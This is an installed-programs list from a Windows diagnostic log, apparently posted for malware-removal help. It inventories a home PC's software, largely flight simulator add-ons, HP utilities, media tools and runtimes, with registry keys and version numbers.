Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.020.20039 - Adobe Systems Incorporated)

Adobe After Effects CC 2015 (HKLM-x32\...\{147EC100-14BE-45EF-AB42-35BAEE7D02F0}) (Version: 13.5.0 - Adobe Systems Incorporated)

Adobe Flash Player 23 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 23.0.0.185 - Adobe Systems Incorporated)

Adobe Shockwave Player 12.1 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.1.8.158 - Adobe Systems, Inc.)

Aerosoft's - Airbus A320-A321 - FSX (HKLM-x32\...\Airbus A320-A321 - FSX) (Version: 1.30 - Aerosoft)

Airport Design Editor 170 (HKLM-x32\...\{FACD7476-0E32-4A35-9741-1049BE879267}) (Version: 1.70.6029.0 - ScruffyDuck Software)

Apple Application Support (32-bit) (HKLM-x32\...\{FE5C2FAA-118D-4509-B51D-3F71CC9E1B3E}) (Version: 4.3 - Apple Inc.)

Apple Application Support (64-bit) (HKLM\...\{2937FD88-C9D6-4B82-B539-37CD0A572F42}) (Version: 4.3 - Apple Inc.)

Apple Mobile Device Support (HKLM\...\{2E4AF2A6-50EA-4260-9BA4-5E582D11879A}) (Version: 9.3.0.15 - Apple Inc.)

Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.)

Audacity 2.1.1 (HKLM-x32\...\Audacity®_is1) (Version: 2.1.1 - Audacity Team)

Auto Clicker v2.2 (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\{C0A7E4F3-82CC-416B-82C6-BA06AACFD635}_is1) (Version: 2.2 - MurGee.com)

Autodesk Application Manager (HKLM-x32\...\Autodesk Application Manager) (Version: 4.0.69.0 - Autodesk)

Autodesk Download Manager (HKLM-x32\...\{C897D9EC-13C6-4A22-ABF7-33F2126A7DB6}) (Version: 3.0.8.0 - Autodesk, Inc.)

AV Voice Changer Software Diamond 9.0 (HKLM-x32\...\AV Voice Changer Software Diamond 9.0) (Version: 9.0.30 - AVSOFT Corp.)

Avidemux 2.6 - 64 bits (HKLM-x32\...\Avidemux 2.6 - 64 bits (64-bit)) (Version: 2.6.911.151222 - )

B787 for FSX (HKLM-x32\...\InstallShield_{04241DC8-98A4-41AC-A419-E23D6B401AA0}) (Version: 1.00.0000 - AeroSim Co.,Ltd.)

B787 for FSX (x32 Version: 1.00.0000 - AeroSim Co.,Ltd.) Hidden

Bandicam (HKLM-x32\...\Bandicam) (Version: 2.4.1.903 - Bandisoft.com)

Bandisoft MPEG-1 Decoder (HKLM-x32\...\BandiMPEG1) (Version:  - Bandisoft.com)

Blender (HKLM\...\{70DFC1C6-C234-4B4D-87C1-E01793AAB130}) (Version: 2.78.0 - Blender Foundation)

BlueStacks App Player (HKLM-x32\...\BlueStacks) (Version: 2.5.61.6289 - BlueStack Systems, Inc.)

Boeing 767-300 twelve repaints FSX & P3D (HKLM\...\{D2A24725-5F68-49B2-BF2F-07360D885699}) (Version: 1 - SkySpirit2010, Thomas Ruth, Emil Serafino)

Boeing B737-823 Advanced VC FSX & P3D (HKLM\...\{330F6375-B0DB-4CDD-B1EB-B83C43810D11}) (Version: 1 - Project OpenSky, Alejandro Rojas Lucenda, FSRepaintsGER, Adam Murphy)

Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)

Camtasia Studio 8 (HKLM-x32\...\{AF33D0D2-2627-4AC8-8473-FDBB7892129C}) (Version: 8.6.0.2079 - TechSmith Corporation)

Captain Sim UHDT Base pack v1.02 (HKU\S-1-5-21-23814709-2432651133-2868963390-1010\...\Captain Sim UHDT Base pack v1.02) (Version:  - )

CaptainSim 757-200 PRO 4.2 (HKLM-x32\...\{5B57D4F1-66BA-448C-97F1-23F73517C694}_is1) (Version:  - komu)

CASecureBrowser (HKLM-x32\...\{FA3C5DAC-79B6-493B-9613-0FF5760AAEE5}) (Version: 8.0.0 - AIR)

CCleaner (HKLM\...\CCleaner) (Version: 5.12 - Piriform)

Chrome Remote Desktop Host (HKLM-x32\...\{159AA592-31AA-4EAC-A6CB-B47AB2CB1476}) (Version: 52.0.2743.48 - Google Inc.)

Convert AVI to MP4 (HKLM-x32\...\{9ECE13D2-C028-44CB-8A96-A65196E7BBE7}_is1) (Version:  - convertavitomp4.com)

CoolSoft VirtualMIDISynth 1.15.2 (HKLM-x32\...\CoolSoft VirtualMIDISynth) (Version: 1.15.2.0 - CoolSoft)

Cyberlink PhotoDirector (HKLM-x32\...\InstallShield_{5A454EC5-217A-42a5-8CE1-2DDEC4E70E01}) (Version: 5.0.3.5715 - CyberLink Corp.)

Cyberlink PhotoDirector (Version: 5.0.3.5715 - CyberLink Corp.) Hidden

CyberLink Power2Go 8 (HKLM-x32\...\InstallShield_{2A87D48D-3FDF-41fd-97CD-A1E370EFFFE2}) (Version: 8.0.7.4016 - CyberLink Corp.)

CyberLink PowerDVD 12 (HKLM-x32\...\InstallShield_{B46BEA36-0B71-4A4E-AE41-87241643FA0A}) (Version: 12.0.4.4223 - CyberLink Corp.)

CyberLink YouCam (HKLM-x32\...\InstallShield_{01FB4998-33C4-4431-85ED-079E3EEFE75D}) (Version: 5.0.4.4218 - CyberLink Corp.)

D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden

DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.4.0.0192 - Disc Soft Ltd)

Debut Video Capture Software (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Debut) (Version: 3.01 - NCH Software)

DisableMSDefender (Version: 1.0.0 - Hewlett-Packard Company) Hidden

DiscAuthor (x32 Version: 9.3.00 - Sony Corporation) Hidden

EditVoicepack X (HKLM-x32\...\{493687F8-8D57-47C4-87B6-D46D7C5203BF}) (Version: 4.0.7 - Bevelstone Production)

Energy Star (HKLM\...\{465CA2B6-98AF-4E77-BE22-A908C34BB9EC}) (Version: 1.0.9 - Hewlett-Packard Company)

Evernote v. 5.3 (HKLM-x32\...\{E461B1AC-BC3C-11E3-B5B8-00163E98E7D6}) (Version: 5.3.0.3360 - Evernote Corp.)

Express Burn Disc Burning Software (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\ExpressBurn) (Version: 5.06 - NCH Software)

EZdok Camera for Microsoft Flight Simulator X (HKLM-x32\...\EZdok Camera for Microsoft Flight Simulator X) (Version:  - )

f.lux (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Flux) (Version:  - )

Family Protection (HKLM-x32\...\{08DE682A-3858-4591-9EBB-E5290E4DC3DD}) (Version: 2.6.116.1 - McAfee, Inc.)

FeelThere E-Jets v.2 (HKU\S-1-5-21-23814709-2432651133-2868963390-1010\...\FeelThere E-Jets v.2) (Version:  - )

Flight Simulator First Officer version 2.3 (HKLM-x32\...\{AF5E7C31-99DF-4218-8E52-F1B3FE3FD9A3}_is1) (Version: 2.3 - Flight Simulator Addons)

Free Video Compressor (HKLM-x32\...\{01554C33-4131-4BC7-9E6D-AF85E02BDF4F}_is1) (Version:  - freevideocompressor.com)

FS Recorder 2.1  for FSX (HKLM-x32\...\{EB74294F-B8FC-4387-BEBF-275E36C6076C}) (Version: 2.1.0.0 - Matthias Neusinger)

FS Water Configurator 3.15 (HKLM\...\FS Water Configurator) (Version:  - )

FSDreamTeam GSX FSX (HKLM-x32\...\FSDreamTeam GSX FSX_is1) (Version: 1.8.4 - VIRTUALI s.a.s.)

FSDreamTeam Los Angeles International FSX (HKLM-x32\...\FSDreamTeam Los Angeles International FSX_is1) (Version: 1.6.0 - VIRTUALI Sagl)

FSFO version 2.0 (HKLM-x32\...\{64C6044E-CA51-47FF-99D7-A175399334CF}_is1) (Version: 2.0 - Flight Simulator Addons)

FSX FSND MD 83 version 2 (HKLM-x32\...\FSX FSND MD 83 version 2) (Version:  - )

FSX Mission Editor (HKLM-x32\...\{DF5EC16F-6C64-45F8-A6E5-6D5D1F6DB0CA}) (Version: 1.0.3824 - FSAddon)

GIMP 2.8.18 (HKLM\...\GIMP-2_is1) (Version: 2.8.18 - The GIMP Team)

Google Chrome (HKLM-x32\...\Google Chrome) (Version: 53.0.2785.143 - Google Inc.)

Google Earth (HKLM-x32\...\{2C44ABB9-8621-4EF5-AF34-0886DCDA7C21}) (Version: 7.1.7.2600 - Google)

Google Earth Plug-in (HKLM-x32\...\{57BB4801-61C8-4E74-9672-2160728A461E}) (Version: 7.1.5.1557 - Google)

Google Talk Plugin (HKLM-x32\...\{F9B579C2-D854-300A-BE62-A09EB9D722E4}) (Version: 5.41.3.0 - Google)

Google Update Helper (x32 Version: 1.3.31.5 - Google Inc.) Hidden

Gramblr (HKLM\...\Gramblr) (Version: 2.7.9 - Gramblr Team)

Hewlett-Packard ACLM.NET v1.2.2.3 (x32 Version: 1.00.0000 - Hewlett-Packard Company) Hidden

HitFilm 4 Express (HKLM\...\{B266DF92-432D-4985-91C3-70148568AB79}) (Version: 4.0.5422.10801 - FXHOME)

Hoyle Puzzle and Board Games Classic (HKLM-x32\...\Hoyle Puzzle and Board Games Classic) (Version:  - )

HP 3D DriveGuard (HKLM-x32\...\{13133E99-B0D5-4143-B832-AAD55C62A41C}) (Version: 6.0.19.1 - Hewlett-Packard Company)

HP CoolSense (HKLM-x32\...\{ADE2F6A7-E7BD-4955-BD66-30903B223DDF}) (Version: 2.20.41 - Hewlett-Packard Company)

HP Documentation (HKLM-x32\...\{3C7B723A-1108-455C-B65B-FF2251E1E5A3}) (Version: 1.1.0.0 - Hewlett-Packard)

HP ENVY 7640 series Basic Device Software (HKLM\...\{24BF3898-2667-4645-9448-8C6765B801A5}) (Version: 34.2.117.50647 - Hewlett-Packard Co.)

HP ENVY 7640 series Help (HKLM-x32\...\{5845A5C9-AA03-4D91-9793-1A2563CE0129}) (Version: 34.0.0 - Hewlett Packard)

HP ePrint (HKLM-x32\...\{2794875B-6CCF-48B8-84A5-5B10DB98BEE6}) (Version: 14.0.14176.1823 - Hewlett-Packard)

HP Photo Creations (HKLM-x32\...\HP Photo Creations) (Version: 1.0.0.7702 - HP)

HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.7745.4851 - Hewlett-Packard)

HP SimplePass (HKLM-x32\...\InstallShield_{314FAD12-F785-4471-BCE8-AB506642B9A1}) (Version: 8.01.11 - Hewlett-Packard)

HP Support Assistant (HKLM-x32\...\{7FE016CC-DAA9-4E21-BD2F-98390D1E6F3F}) (Version: 7.6.23.8 - Hewlett-Packard Company)

HP Support Solutions Framework (HKLM-x32\...\{55065080-504F-43BB-BE00-36B80D7D39A5}) (Version: 12.0.30.219 - Hewlett-Packard Company)

HP System Event Utility (HKLM-x32\...\{8B4EE87E-6D40-4C91-B5E8-0DC77DC412F1}) (Version: 1.4.1 - Hewlett-Packard Company)

HP Update (HKLM-x32\...\{912D30CF-F39E-4B31-AD9A-123C6B794EE2}) (Version: 5.005.002.002 - Hewlett-Packard)

HP Utility Center (HKLM\...\{DCD5C599-5CCC-4E37-8938-FBB548D780C6}) (Version: 2.5.3 - Hewlett-Packard Company)

HP Wireless Button Driver (HKLM-x32\...\{30B2D1D8-0A07-4B71-9553-0710C5D31E35}) (Version: 1.1.2.1 - Hewlett-Packard Company)

HPDiagnosticAlert (x32 Version: 1.00.0001 - Microsoft) Hidden

iCloud (HKLM\...\{4B48E22A-2FB0-4EFA-B99E-954B1E50CD69}) (Version: 5.1.0.34 - Apple Inc.)

IcoFX 2.12 (HKLM-x32\...\IcoFX 2_is1) (Version: 2.12 - )

iFly Jets - The 737NG for FS2004 (HKLM-x32\...\iFly Jets - The 737NG for FS2004) (Version:  - )

iFly Jets - The 737NG for FSX (HKLM-x32\...\iFly Jets - The 737NG for FSX) (Version:  - )

iFunbox (v3.0.3109.1352) (HKLM-x32\...\iFunbox_is1) (Version: v3.0.3109.1352 - iFunbox DevTeam)

IHA_MessageCenter (HKLM-x32\...\{35AC3CFF-8021-4804-9967-4919A663128D}) (Version: 2.0.68 - Verizon)

Inst5675 (Version: 8.01.11 - Softex Inc.) Hidden

Inst5676 (Version: 8.01.11 - Softex Inc.) Hidden

Intel(R) Control Center (HKLM-x32\...\{F8A9085D-4C7A-41a9-8A77-C8998A96C421}) (Version: 1.2.1.1008 - Intel Corporation)

Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.23.1766 - Intel Corporation)

Intel(R) PRO/Wireless Driver (HKLM\...\{ac7ad2d7-04b3-460c-b370-07e3d3e3aa4e}) (Version: 17.01.0000.1697 - Intel Corporation)

Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4360 - Intel Corporation)

Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.9.1000 - Intel Corporation)

Intel(R) Smart Connect Technology (HKLM\...\{51AC86D3-C431-48AD-9195-0D6C930D07CD}) (Version: 4.2.41.2710 - Intel Corporation)

Intel(R) Virtual Buttons (HKLM-x32\...\1992736F-C90A-481C-B21B-EE34CAD07387) (Version: 1.0.0.14 - Intel Corporation)

Intel(R) Wireless Bluetooth(R) 4.0 (HKLM-x32\...\{C9324B6F-FC2B-4CA0-8C42-793D7099BDA1}) (Version: 17.0.1422.02 - Intel Corporation)

iTunes (HKLM\...\{A31C5565-90D9-4615-AE13-94D86C3836C7}) (Version: 12.3.3.17 - Apple Inc.)

Java 8 Update 31 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218031F0}) (Version: 8.0.310 - Oracle Corporation)

Java 8 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218045F0}) (Version: 8.0.450 - Oracle Corporation)

Java 8 Update 51 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218051F0}) (Version: 8.0.510 - Oracle Corporation)

Java 8 Update 60 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218060F0}) (Version: 8.0.600.27 - Oracle Corporation)

Jed's Half-Life Model Viewer 1.3.6 (HKLM-x32\...\Jed's Half-Life Model Viewer) (Version: 1.3.6 - wunderboy.org)

Junk Mail filter update (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden

Just Flight - 757 Jetliner - American Airlines (New) Livery Pack (HKLM-x32\...\{17F122A7-2F9B-4794-91F8-DF0FB253E74F}) (Version: 1.00.000 - Just Flight)

Just Flight - 757 Jetliner Freemium (HKLM-x32\...\{B0F7B3B5-E856-4558-BD7C-BDA32943C783}) (Version: 1.00.000 - Just Flight)

LAME v3.99.3 (for Windows) (HKLM-x32\...\LAME_is1) (Version:  - )

Level-D 767-300 for FSX (HKU\S-1-5-21-23814709-2432651133-2868963390-1010\...\Level-D 767-300 for FSX) (Version:  - )

Lightworks (HKLM-x32\...\{E94DD4E4-7746-472c-AA7B-1242FED0CFC8}) (Version: 12.6.0.0 - Lightworks)

LiveWeb (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\{F0A7B33E-C872-42C8-B1A9-55450809DAFF}) (Version: 4.00 - Shyam Pillai)

Malwarebytes Anti-Malware version 2.2.1.1043 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.2.1.1043 - Malwarebytes)

McAfee Virtual Technician (HKLM-x32\...\McAfee Virtual Technician) (Version: 7.6.0.202 - McAfee, Inc.)

McAfee WebAdvisor (HKLM-x32\...\{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}) (Version: 4.0.279 - McAfee, Inc.)

McDonnell Douglas DC-10 Version 2 FSX & P3D (HKLM\...\{0D9F34DB-535D-4FA2-B622-D03B6F479EBE}) (Version: 1 - Thomas Ruth and Erick Cantu, sounds by Dennis Vormberge)

MergeModule_x86 (x32 Version: 9.3.00 - Sony Corporation) Hidden

Microsoft Expression Encoder 4 (HKLM-x32\...\Encoder_4.0.1651.0) (Version: 4.0.1651.0 - Microsoft Corporation)

Microsoft Expression Encoder 4 Screen Capture Codec (HKLM-x32\...\{952DCCD8-4039-46C8-BC8B-5C1EB6C8E130}) (Version: 4.0.1651.0 - Microsoft Corporation)

Microsoft Flight Simulator SimConnect Client v10.0.60905.0 (HKLM-x32\...\{D1AC9B0B-2727-4811-91DC-1FC3C4E47A9B}) (Version: 10.0.60905.0 - Microsoft Corporation)

Microsoft Flight Simulator SimConnect Client v10.0.61259.0 (HKLM-x32\...\{D61CA184-3F6D-4A50-B2CC-7A18447D6A8D}) (Version: 10.0.61259.0 - Microsoft Corporation)

Microsoft Flight Simulator X Service Pack 2 (HKLM-x32\...\{4847BBB9-EADD-4C92-90BF-4223B0892FF6}) (Version: 10.0.61472.0 - Microsoft Game Studios)

Microsoft Mouse and Keyboard Center (HKLM\...\Microsoft Mouse and Keyboard Center) (Version: 2.3.188.0 - Microsoft Corporation)

Microsoft Office Home and Student 2016 - en-us (HKLM\...\HomeStudentRetail - en-us) (Version: 16.0.7369.2038 - Microsoft Corporation)

Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{A49F249F-0C91-497F-86DF-B2585E8E76B7}) (Version: 8.0.50727.42 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)

Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)

Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)

Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)

Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)

Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)

Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)

Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)

Microsoft Visual Studio 2010 Tools for Office Runtime (x64) (HKLM\...\Microsoft Visual Studio 2010 Tools for Office Runtime (x64)) (Version: 10.0.50903 - Microsoft Corporation)

MidiEditor (HKLM-x32\...\D4338446-FFE6-1A12-ACFF-CB6F6A6A70A1) (Version: 3.0.0 - Markus Schwenk)

Movavi Video Editor 11 (HKLM-x32\...\Movavi Video Editor 11) (Version: 11.1.0 - Movavi)

Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden

Mozilla Firefox 44.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 44.0.2 (x86 en-US)) (Version: 44.0.2 - Mozilla)

Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 44.0.2 - Mozilla)

MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)

MultitrackStudio Lite 8.1.3 (64-bit) (HKLM\...\MultitrackStudio64_is1) (Version:  - Bremmers Audio Design)

Office 16 Click-to-Run Extensibility Component (x32 Version: 16.0.7369.2038 - Microsoft Corporation) Hidden

Office 16 Click-to-Run Extensibility Component 64-bit Registration (Version: 16.0.7369.2038 - Microsoft Corporation) Hidden

Office 16 Click-to-Run Licensing Component (Version: 16.0.7369.2038 - Microsoft Corporation) Hidden

Office 16 Click-to-Run Localization Component (x32 Version: 16.0.7369.2038 - Microsoft Corporation) Hidden

Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version:  - )

OpenAL (HKLM-x32\...\OpenAL) (Version:  - )

OpenShot Video Editor (HKLM-x32\...\{C55769E7-0B81-4E22-B5CE-805506E6B6B2}) (Version: 2.0.7 - OpenShot Studios, LLC)

Oracle VM VirtualBox 5.1.6 (HKLM\...\{EEDDD7E2-A7A2-4FA9-8C32-ADB29A5096FF}) (Version: 5.1.6 - Oracle Corporation)

paint.net (HKLM\...\{A1D05314-DC32-4668-A97E-51060EC8BCCE}) (Version: 4.0.12 - dotPDN LLC)

PlayMemories Home (HKLM-x32\...\{94F4815B-755A-4FFA-AFDC-EE8FE776981E}) (Version: 4.3.00.04171 - Sony Corporation)

PMB_ModeEditor (x32 Version: 9.3.00 - Sony Corporation) Hidden

PMB_ServiceUploader (x32 Version: 9.3.00 - Sony Corporation) Hidden

PMDG 737 8900 NGX (HKLM-x32\...\{20708FD5-E94D-4097-A21E-E28564CDBC06}) (Version: 1.00.2888 - PMDG Simulations, LLC.)

PMDG 777-200LR/F Base Package FSX (HKLM-x32\...\{0F16340B-5B5B-4531-8D87-4952E3BCA6E6}) (Version: 1.10.6320 - PMDG Simulations, LLC.)

PMDG 777-300ER Expansion (HKLM-x32\...\{E65EFDE6-0864-40BA-8DDF-E31F736D9000}) (Version: 1.10.6320 - PMDG Simulations, LLC.)

POSKY Boeing 777-200 Pack FSX & P3D (HKLM\...\{684D778C-02D2-437D-AAEA-A2648B01AA93}) (Version: 1 - Project Open Sky)

Prism Video File Converter (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Prism) (Version: 2.62 - NCH Software)

PRO-ATC/X version 1.2.2.6 (HKLM-x32\...\PRO-ATC/X_is1) (Version: 1.2.2.6 - )

Product Improvement Study for HP ENVY 7640 series (HKLM\...\{9913BFAE-5E18-4863-8354-452337781573}) (Version: 34.2.117.50647 - Hewlett-Packard Co.)

Python 3.5.1 (32-bit) (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\{c39d559b-aa83-4476-ba20-988a35a1199a}) (Version: 3.5.1150.0 - Python Software Foundation)

Python 3.5.1 Core Interpreter (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden

Python 3.5.1 Development Libraries (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden

Python 3.5.1 Documentation (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden

Python 3.5.1 Executables (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden

Python 3.5.1 Launcher (32-bit) (HKLM-x32\...\{17778F7B-FB5A-4A93-9719-D75BAF673498}) (Version: 3.5.150.0 - Python Software Foundation)

Python 3.5.1 pip Bootstrap (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden

Python 3.5.1 Standard Library (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden

Python 3.5.1 Tcl/Tk Support (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden

Python 3.5.1 Test Suite (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden

Python 3.5.1 Utility Scripts (32-bit) (x32 Version: 3.5.1150.0 - Python Software Foundation) Hidden

qBittorrent 3.3.7 (HKLM-x32\...\qBittorrent) (Version: 3.3.7 - The qBittorrent project)

QualityWings Ultimate 757 Collection FSX (HKLM-x32\...\QualityWings Ultimate 757 Collection FSX_is1) (Version: 1.3.2 - QualityWings)

Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.273.40 - Realtek Semiconductor Corp.)

Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.24.1218.2013 - Realtek)

Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7548 - Realtek Semiconductor Corp.)

Remote Desktop assistant (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\b948d155e8353e01) (Version: 1.0.0.102 - Remote Desktop assistant)

S2 version 1.8 (HKLM-x32\...\3712C137-820D-48BE-83B2-DE57BC51343F_is1) (Version: 1.8 - Parallax, Inc.)

Safari (HKLM-x32\...\{C779648B-410E-4BBA-B75B-5815BCEFE71D}) (Version: 5.34.57.2 - Apple Inc.)

SBACSecureBrowser (HKLM-x32\...\{157D208A-3283-46B2-B038-54F9BA4688E3}) (Version: 8.1.0 - AIR)

ScriptVOX Studio (HKLM-x32\...\{57f97356-8f1d-45cf-a325-9de4c0896ced}) (Version: 2.0.19.17620 - Screaming Bee)

ScriptVOX Studio (x32 Version: 2.0.19.17620 - Screaming Bee) Hidden

SDU version 3.8 (HKLM-x32\...\{A23B547D-36B0-4B85-B68A-AADF6C9A723B}_is1) (Version: 3.8 - )

SketchUp 2016 (HKLM\...\{E2B66CF6-ABA0-4E5F-B426-7478B18301AE}) (Version: 16.1.1449 - Trimble Navigation Limited)

SMART Common Files (HKLM-x32\...\{ED2455F7-6AA6-4D3C-85E9-A72297DD7051}) (Version: 11.0.246.0 - SMART Technologies ULC)

SpellQuizzer 1.4.2 (HKLM-x32\...\SpellQuizzer_is1) (Version:  - TedCo Software)

Splashtop Software Updater (HKLM-x32\...\Splashtop Software Updater) (Version: 1.5.6.15 - Splashtop Inc.)

Splashtop Streamer (HKLM-x32\...\{B7C5EA94-B96A-41F5-BE95-25D78B486678}) (Version: 3.1.0.0 - Splashtop Inc.)

Spotify (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\Spotify) (Version: 1.0.34.146.g28f9eda2 - Spotify AB)

swMSM (x32 Version: 12.0.0.1 - Adobe Systems, Inc) Hidden

Synaptics ClickPad Driver (HKLM\...\SynTPDeinstKey) (Version: 19.0.12.107 - Synaptics Incorporated)

Synthesia (HKLM-x32\...\Synthesia) (Version: 10.2 - Synthesia LLC)

SynthFont (HKLM-x32\...\SynthFont) (Version:  - )

The Project SkyHigh MD-80 Base pack for FS2004 (HKLM-x32\...\The Project SkyHigh MD-80 Base pack for FS2004) (Version:  - )

UK2000 Heathrow Free FSX  (HKLM-x32\...\UK2000 Heathrow Free FSX) (Version: 3.0 - UK2000 Scenery)

Unity Web Player (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\UnityWebPlayer) (Version: 5.2.0f3 - Unity Technologies ApS)

Universal Extractor 1.6.1 (HKLM-x32\...\Universal Extractor_is1) (Version: 1.6.1 - Jared Breland)

Verizon Internet Security Suite (HKLM-x32\...\MSC) (Version: 15.0.166 - McAfee, Inc.)

Vz In-Home Agent (HKLM-x32\...\VzInHomeAgent) (Version: 9.0.76.0 - Verizon)

VzDownloadManager (HKU\S-1-5-21-23814709-2432651133-2868963390-1001\...\VzDownloadManager) (Version: 2.0.0.24 - Verizon)

Windows 10 Upgrade Assistant (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.17354 - Microsoft Corporation)

Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)

WinRAR 5.31 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH)

Wirecast (HKLM\...\{13CCAC84-0C34-4D13-8C99-02D9F8B4C714}) (Version: 6.0.6 - Telestream LLC)

Works Suite OS Pack (x32 Version: 1.0.0.0000 - Microsoft Corporation) Hidden

